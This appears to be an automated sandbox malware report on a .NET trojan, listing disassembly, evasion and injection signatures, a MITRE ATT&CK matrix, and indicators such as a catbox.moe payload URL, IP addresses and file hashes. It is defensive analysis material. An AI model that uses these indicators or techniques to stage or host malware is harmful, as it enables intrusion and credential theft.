                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]2_2_01658BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]2_2_01658BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]2_2_01658BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167EBFC mov eax, dword ptr fs:[00000030h]2_2_0167EBFC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DCBF0 mov eax, dword ptr fs:[00000030h]2_2_016DCBF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]2_2_01650BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]2_2_01650BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]2_2_01650BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]2_2_01670BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]2_2_01670BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]2_2_01670BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FEBD0 mov eax, dword ptr fs:[00000030h]2_2_016FEBD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01704BB0 mov eax, dword ptr fs:[00000030h]2_2_01704BB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01704BB0 mov eax, dword ptr fs:[00000030h]2_2_01704BB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660BBE mov eax, dword ptr fs:[00000030h]2_2_01660BBE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660BBE mov eax, dword ptr fs:[00000030h]2_2_01660BBE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]2_2_0168CA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]2_2_0168CA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]2_2_0168CA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FEA60 mov eax, dword ptr fs:[00000030h]2_2_016FEA60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CCA72 mov eax, dword ptr fs:[00000030h]2_2_016CCA72
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CCA72 mov eax, dword ptr fs:[00000030h]2_2_016CCA72
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]2_2_01656A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660A5B mov eax, dword ptr fs:[00000030h]2_2_01660A5B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660A5B mov eax, dword ptr fs:[00000030h]2_2_01660A5B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167EA2E mov eax, dword ptr fs:[00000030h]2_2_0167EA2E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168CA24 mov eax, dword ptr fs:[00000030h]2_2_0168CA24
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168CA38 mov eax, dword ptr fs:[00000030h]2_2_0168CA38
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01674A35 mov eax, dword ptr fs:[00000030h]2_2_01674A35
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01674A35 mov eax, dword ptr fs:[00000030h]2_2_01674A35
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DCA11 mov eax, dword ptr fs:[00000030h]2_2_016DCA11
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168AAEE mov eax, dword ptr fs:[00000030h]2_2_0168AAEE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168AAEE mov eax, dword ptr fs:[00000030h]2_2_0168AAEE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]2_2_016A6ACC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]2_2_016A6ACC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]2_2_016A6ACC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650AD0 mov eax, dword ptr fs:[00000030h]2_2_01650AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01684AD0 mov eax, dword ptr fs:[00000030h]2_2_01684AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01684AD0 mov eax, dword ptr fs:[00000030h]2_2_01684AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658AA0 mov eax, dword ptr fs:[00000030h]2_2_01658AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658AA0 mov eax, dword ptr fs:[00000030h]2_2_01658AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A6AA4 mov eax, dword ptr fs:[00000030h]2_2_016A6AA4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]2_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724A80 mov eax, dword ptr fs:[00000030h]2_2_01724A80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01688A90 mov edx, dword ptr fs:[00000030h]2_2_01688A90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E8D6B mov eax, dword ptr fs:[00000030h]2_2_016E8D6B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]2_2_01650D59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]2_2_01650D59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]2_2_01650D59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]2_2_01658D59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]2_2_01658D59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]2_2_01658D59
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  1
                  Disable or Modify Tools
                  OS Credential Dumping121
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  41
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  111
                  Process Injection
                  Security Account Manager41
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets12
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe21%ReversingLabs
                  file.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  files.catbox.moe
                  108.181.20.35
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://files.catbox.moe/ne8lox.mp4false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netfile.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://files.catbox.moefile.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/mgravell/protobuf-netifile.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==file.exefalse
                                high
                                https://github.com/mgravell/protobuf-netJfile.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stackoverflow.com/q/2152978/23354file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        108.181.20.35
                                        files.catbox.moeCanada
                                        852ASN852CAfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1562756
                                        Start date and time:2024-11-26 00:11:05 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 16s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:file.exe
                                        Detection:MAL
                                        Classification:mal88.troj.evad.winEXE@3/0@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 237
                                        • Number of non-executed functions: 231
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: file.exe
                                        TimeTypeDescription
                                        18:11:56API Interceptor46x Sleep call for process: file.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • files.catbox.moe/p1yr9i.pdf
                                        SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                        • files.catbox.moe/nzct1p
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        files.catbox.moehttps://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Exploit Detector.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ASN852CAfbot.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 209.29.180.177
                                        fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 142.169.14.254
                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                        • 161.184.125.91
                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                        • 99.199.126.12
                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 75.157.133.90
                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                        • 207.216.32.196
                                        apep.mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 207.6.179.91
                                        apep.arm6.elfGet hashmaliciousMiraiBrowse
                                        • 75.156.102.38
                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 137.186.28.11
                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 173.180.42.128
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eOrden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousCryptbotBrowse
                                        • 108.181.20.35
                                        INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 108.181.20.35
                                        Evidence of copyright infringement (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Compilation of videos and images protected by copyright.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 108.181.20.35
                                        xeno.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        X4S15uEwg5.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.829055340453007
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:233'472 bytes
                                        MD5:0a089e934eb856c3e809d0fac53000c7
                                        SHA1:661f86072031587be18ada0b6606ee82bb52038f
                                        SHA256:f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
                                        SHA512:026152c47e9547d1f2c254bdb824f9b8ac113df6b3a98c61b1ac4adde0286dc8a06ade4a3bd73a149b4a9eaad0f86d702ab4b4042dbb7c17cc0af5a14e34cadc
                                        SSDEEP:3072:Yc9licCNZFl65sQpIVlccSMXudYCKuY0OUM6Aoft7Gfu4V0tvHwytyUbthvB2C/9:YpFFlssZVlccSMXudcDVilp
                                        TLSH:B3343B4823C91A92F2EE0F37E4F36A518774FA51AF2FD30F684414FE0865B958951763
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Eg............................Z.... ........@.. ....................................`................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x43a25a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x67452B8B [Tue Nov 26 01:59:39 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a2100x4a.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x608.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x390000x0.text
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x382600x384001931c9524e11329e565844fa1d3172d3False0.47356770833333334data5.852483276358291IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x3c0000x6080x800ff8621dc8a96a099082f9302adaae846False0.34228515625data3.513048066419696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
